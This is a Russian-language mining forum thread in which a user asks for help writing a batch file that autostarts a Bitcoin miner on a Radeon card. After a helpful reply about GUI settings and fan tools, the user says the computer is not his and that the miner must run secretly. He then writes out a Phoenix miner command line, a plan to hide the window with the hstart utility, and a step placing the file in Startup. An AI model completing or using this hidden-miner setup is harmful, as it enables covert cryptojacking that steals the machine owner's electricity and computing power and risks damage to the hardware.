Перейти к содержанию

xDi

Рекомендуемые сообщения

Всем привет! Народ помогите новичку сделать батник для автозапуска майнера от 50miner.org при включении компьютера. Карта стоит радеон HD 6930.

Вот что в нем писать какие параметры надо указать??? Можно ли прописать в нем скорость вентилятора чтобы не напрягал и при этом выставить скорость майнера чтобы карту не спалить???

Ссылка на комментарий
Поделиться на другие сайты

@xDi,

Вообще сама программа 50miner имеет графический интерфейс, и как таковой батник писать не нужно, все настройки задаются по умолчанию, либо вручную в окне программы.

 

По данному адресу (http://50miner.org/ru/) на первой картинке изображено основное окно программы, вверху поставь галочку в пункте "Расширенные" и ты увидишь расширенные параметры для настройки, как изображено на третьем изображении. А далее обрати внимание на 7 кнопок сверху справа. Потыкай по ним, посмотри какую информацию и возможности они тебе дадут.

 

На вкладке оверклокинга ты сможешь наблюдать за нагрузкой карты, за температурой, а также вручную настроить скорость вращения вертушек на видеокарте. Но для тонкой настройки вращения вертушек я рекомендую другие утилиты, например замечательную прогу SpeedFan. Если соберёшься разгонять карту, то лучше используй другие программы, н.р., MSI Afterburner. Кстати в MSI Afterburner также можно тонко настроить скорость вращения вертушек видеокарточек.

Ссылка на комментарий
Поделиться на другие сайты

BigScal, Спасибо за ответ, но все это я как бы уже освоил и параметры подобрал какие нужны. Мне вообщем надо сделать так чтобы при включении компа запускался майнер скрытно при включении компа, т.к. комп не мой скажем так) Поэтому как я уже вычитал нужно сделать батник и скачать phoenix правильно?

А чтобы не палили скачать http://www.ntwind.com/software/hstart/

и сделать так:

 

Phoenix:
1. Переходим в папку с фениксом
2. Создаем txt-файл и вписываем в него:
phoenix -u логин@pool.50btc.com:8332 -k phatk2 BFI_INT=0 FASTLOOP VECTORS AGGRESSION=8 WORKSIZE=128 DEVICE=0

3. расширение меняем на bat  и кидаем ярлык на батник в Автозагрузку.

 

И еще моменты, в батнике WORKSIZE=128 ставить(для майнинга биткоинов)? и как в нем прописать скорость вентилятора?

 

AGGRESSION=8 - это типа ползунка в проге 50miner т.е. чем больше агрессия тем больше хешей?

 

Я правильно все понял?

Изменено пользователем xDi
Ссылка на комментарий
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
  • Similar Topics

    • Батник для перезапуска майнера

      Суть задачи - есть батник, который перезагружает систему если майнер перестаёт майнить. Надо переписать строчку кода, чтобы перезапускался только майнер а не вся система. Батник прилагается. Mining Listener New test.rar

      в Программы для майнинга

    • перестал батник майнера запускаться автоматически

      простите что пишу не по теме. перестал запускаться батник майнера при перезагрузке системы. пробовал переносить и нарабочий стол папку создавая ярлык в автозапуске и в другие места, не помогло. запускаеться теперь только при открытии вручню и только через запуск от администратора. Случилось при обновлении windows 7 на SP1. И обновлении видеодрайверов NVIDIA. Может кто подскажет как быть? Заранее спасибо !!!

      в Мониторинг

    • Не запускается батник флайпула

      При запуске батника флайпула через секунду вылетает. Какая причина?? Что делать?

      в Общие вопросы по майнингу

    • CMD. Батник для удалённой перезагрузки фермы.

      Делюсь наработками. Возникла тут у меня ситуация, когда я увидел на пуле, что одна из карт (основная, та, куда, кук бы монитор подключен) не выдаёт полную мощь. По мониторингу видно, что с частотами всё нормально. Думаю, нужно перезагрузить. Пытаюсь подключиться через ТимВьювер - не даёт, через RDP - нет. Сетевая расшаренная папка при этом доступна. В итоге пошёл (!!!) и нажал Reset, а так как делать этого не хотелось, придумал как сделать так, что бы вообще никуда логиниться не нужно бы

      в Программы для майнинга

    • Андервольт+разгон через батник Claymore v10.0

      В start.bat вписаны следующие параметры: -tt 65 -tstop 85 -cclock 1130 -mclock 2150 -cvddc 850 -mvddc 850 Карты Sapphire RX 580 Nitro+ 8 GB Всё работает замечательно, но при автозапуске фермы в случае отключения питания - параметры стандартные. Стоит лишь перезапустить батник - и всё в норме, даже при обычной перезагрузке параметры меняются по батнику, но вот при отключении питания  - нет.    Может кто-то уже сталкивался с подобной проблемой?   Сторонними прогами не особо хочется пользова

      в Общие вопросы по майнингу

×
×
  • Создать...